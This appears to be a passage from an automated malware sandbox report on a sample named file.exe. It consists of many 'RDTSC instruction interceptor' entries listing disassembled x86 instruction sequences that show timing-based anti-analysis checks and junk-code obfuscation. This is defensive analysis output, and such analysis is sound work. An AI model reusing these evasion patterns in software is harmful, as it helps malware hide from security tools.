              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0507 second address: 7E0524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF64E55829h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0524 second address: 7E0535 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBF64DC8956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0535 second address: 7E053E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E053E second address: 7E0591 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jng 00007FBF64DC8975h 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 jmp 00007FBF64DC8968h 0x00000019 push eax 0x0000001a push edx 0x0000001b jl 00007FBF64DC8956h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0591 second address: 7E0595 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E1324 second address: 7E132A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E1682 second address: 7E1693 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF64E55816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E1693 second address: 7E16E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FBF64DC896Dh 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FBF64DC8958h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FBF64DC895Ch 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E2DAB second address: 7E2DB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FBF64E55816h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E4A84 second address: 7E4A9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF64DC8962h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E4A9A second address: 7E4B33 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FBF64E55818h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 jmp 00007FBF64E55820h 0x0000002a push 00000000h 0x0000002c and edi, dword ptr [ebp+122D3987h] 0x00000032 call 00007FBF64E55826h 0x00000037 mov dword ptr [ebp+122D339Dh], ebx 0x0000003d pop edi 0x0000003e push 00000000h 0x00000040 and esi, dword ptr [ebp+122D387Fh] 0x00000046 xchg eax, ebx 0x00000047 jmp 00007FBF64E55827h 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 jmp 00007FBF64E5581Dh 0x00000055 jc 00007FBF64E55816h 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E5668 second address: 7E56CD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b sub dword ptr [ebp+122D34E0h], esi 0x00000011 push 00000000h 0x00000013 mov edi, 1F0AF264h 0x00000018 or dword ptr [ebp+122D1887h], edi 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007FBF64DC8958h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 0000001Ch 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a xor dword ptr [ebp+122D192Eh], edx 0x00000040 sub dword ptr [ebp+12450CB8h], ebx 0x00000046 xchg eax, ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FBF64DC8962h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E56CD second address: 7E56EE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBF64E5581Ch 0x00000008 jbe 00007FBF64E55816h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push ecx 0x00000012 pushad 0x00000013 jmp 00007FBF64E5581Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E7FD6 second address: 7E806C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF64DC8961h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FBF64DC8958h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 push 00000000h 0x00000029 mov edi, 65590618h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007FBF64DC8958h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a mov edi, ebx 0x0000004c xchg eax, ebx 0x0000004d jmp 00007FBF64DC8963h 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 push eax 0x00000057 pop eax 0x00000058 jmp 00007FBF64DC8968h 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E886F second address: 7E8874 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EFC02 second address: 7EFC1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF64DC8965h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EFC1B second address: 7EFC34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF64E55825h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EFC34 second address: 7EFC38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F0C9C second address: 7F0CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F0CA1 second address: 7F0CB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF64DC8963h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F0CB8 second address: 7F0CBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F0CBC second address: 7F0D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 sbb di, 2C06h 0x0000000e push 00000000h 0x00000010 jg 00007FBF64DC8956h 0x00000016 sub dword ptr [ebp+124558EDh], edi 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007FBF64DC8958h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 xchg eax, esi 0x00000039 jnc 00007FBF64DC8964h 0x0000003f push eax 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F1C5D second address: 7F1C89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF64E55826h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c jno 00007FBF64E55816h 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007FBF64E55816h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F0E67 second address: 7F0E9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF64DC8961h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FBF64DC8969h 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F1C89 second address: 7F1CF8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF64E55816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov bx, di 0x0000000f mov bx, 4C94h 0x00000013 push 00000000h 0x00000015 mov bx, cx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007FBF64E55818h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 mov dword ptr [ebp+1245E181h], edx 0x0000003a xchg eax, esi 0x0000003b jng 00007FBF64E5581Eh 0x00000041 push edx 0x00000042 jg 00007FBF64E55816h 0x00000048 pop edx 0x00000049 push eax 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007FBF64E55828h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F0F54 second address: 7F0F5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FBF64DC8956h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F2EC2 second address: 7F2EC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F2EC7 second address: 7F2F2A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBF64DC8958h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+1245CC2Ah] 0x00000011 mov bx, si 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov edi, dword ptr [ebp+124775CCh] 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007FBF64DC8958h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 00000016h 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 mov eax, dword ptr [ebp+122D03CDh] 0x00000048 mov edi, edx 0x0000004a push FFFFFFFFh 0x0000004c jng 00007FBF64DC895Ch 0x00000052 sub dword ptr [ebp+122D2A5Eh], esi 0x00000058 nop 0x00000059 pushad 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F2F2A second address: 7F2F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FBF64E5581Ah 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F5EE2 second address: 7F5EFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF64DC8969h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F5EFF second address: 7F5F16 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jmp 00007FBF64E5581Ah 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F5F16 second address: 7F5F1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F5F1B second address: 7F5F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 jmp 00007FBF64E55826h 0x0000000d push 00000000h 0x0000000f mov dword ptr [ebp+122D1F1Fh], ecx 0x00000015 push 00000000h 0x00000017 clc 0x00000018 jmp 00007FBF64E5581Bh 0x0000001d xchg eax, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 push ebx 0x00000021 jnl 00007FBF64E55816h 0x00000027 pop ebx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F5F5A second address: 7F5F89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FBF64DC8956h 0x00000009 jmp 00007FBF64DC895Fh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 jmp 00007FBF64DC895Fh 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F6F0D second address: 7F6F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBF64E55829h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F6203 second address: 7F6208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F8006 second address: 7F800A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F91D7 second address: 7F91F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jmp 00007FBF651395A0h 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F91F4 second address: 7F91F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F91F8 second address: 7F9202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F7050 second address: 7F7054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F824B second address: 7F824F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F824F second address: 7F8259 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBF65139DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F7054 second address: 7F705A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F705A second address: 7F7070 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBF65139DACh 0x00000008 jnp 00007FBF65139DA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F9385 second address: 7F9389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FB568 second address: 7FB56C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FB56C second address: 7FB582 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBF65139596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FBF6513959Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FB582 second address: 7FB586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FB82F second address: 7FB835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FB835 second address: 7FB839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FB839 second address: 7FB858 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF651395A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FB858 second address: 7FB85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FB85E second address: 7FB867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FD6A1 second address: 7FD6A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FC88A second address: 7FC899 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBF65139596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FC899 second address: 7FC8A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FC8A6 second address: 7FC8B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF6513959Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FC8B6 second address: 7FC931 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FBF65139DA8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 jmp 00007FBF65139DADh 0x00000028 mov dword ptr [ebp+122D17CDh], ecx 0x0000002e push dword ptr fs:[00000000h] 0x00000035 mov dword ptr [ebp+122D1983h], edi 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 mov eax, dword ptr [ebp+122D038Dh] 0x00000048 mov dword ptr [ebp+122D1BD1h], ecx 0x0000004e push FFFFFFFFh 0x00000050 cld 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 pushad 0x00000056 popad 0x00000057 jmp 00007FBF65139DB4h 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FC931 second address: 7FC937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FC937 second address: 7FC93B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FE61F second address: 7FE697 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF651395A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FBF65139598h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 push esi 0x00000025 mov ebx, dword ptr [ebp+12477199h] 0x0000002b pop edi 0x0000002c movsx edi, ax 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007FBF65139598h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b add dword ptr [ebp+12480156h], edx 0x00000051 push 00000000h 0x00000053 xchg eax, esi 0x00000054 pushad 0x00000055 push edi 0x00000056 jnc 00007FBF65139596h 0x0000005c pop edi 0x0000005d push esi 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FE697 second address: 7FE6AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jg 00007FBF65139DACh 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FD906 second address: 7FD90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FD90C second address: 7FD938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jng 00007FBF65139DA6h 0x0000000f jmp 00007FBF65139DB4h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jc 00007FBF65139DA6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FD938 second address: 7FD93C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 801547 second address: 80154B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80154B second address: 801554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 806491 second address: 806499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 806499 second address: 8064A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007FBF65139596h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8064A7 second address: 8064AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805B57 second address: 805B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805B61 second address: 805B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FBF65139DB8h 0x0000000b jmp 00007FBF65139DB0h 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805EA3 second address: 805EB1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBF65139596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
